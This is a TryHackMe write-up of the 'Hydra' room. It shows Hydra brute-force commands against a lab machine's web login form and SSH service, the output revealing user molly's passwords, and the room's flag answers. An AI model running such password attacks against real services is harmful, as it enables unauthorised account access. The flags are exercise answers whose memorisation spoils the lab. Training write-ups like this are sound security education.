---
layout: post
title: "Hydra - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - network
  - bruteforce
date: 2020/09/17 00:25:00
thumbnail: /images/TryHackMe/Hydra.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Hydra
- **Profile:** [tryhackme.com](https://tryhackme.com/room/hydra)
- **Difficulty:** Easy
- **Description**: Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials.

![Hydra](/images/TryHackMe/Hydra.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
pikaur -S hydra
```

## [Task 2] Using Hydra

**#1**

> Use Hydra to bruteforce molly's web password. What is flag 1?

Answer: {% spoiler THM{2673a7dd116de68e85c48ec0b1f2612e} %}

```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.26.252 http-post-form '/login:username=^USER^&password=^PASS^:F=incorrect'
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-16 22:20:39
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.26.252:80/login:username=^USER^&password=^PASS^:F=incorrect
[80][http-post-form] host: 10.10.26.252   login: molly   password: sunshine
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-16 22:20:44
```

**#2**

> Use Hydra to bruteforce molly's SSH password. What is flag 2?

Answer: {% spoiler THM{c8eeb0468febbadea859baeb33b2541b} %}

```
$ hydra -l molly -P /usr/share/wordlists/passwords/rockyou.txt 10.10.26.252 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-16 22:23:39
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344398 login tries (l:1/p:14344398), ~3586100 tries per task
[DATA] attacking ssh://10.10.26.252:22/
[22][ssh] host: 10.10.26.252   login: molly   password: butterfly
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-16 22:24:29
```
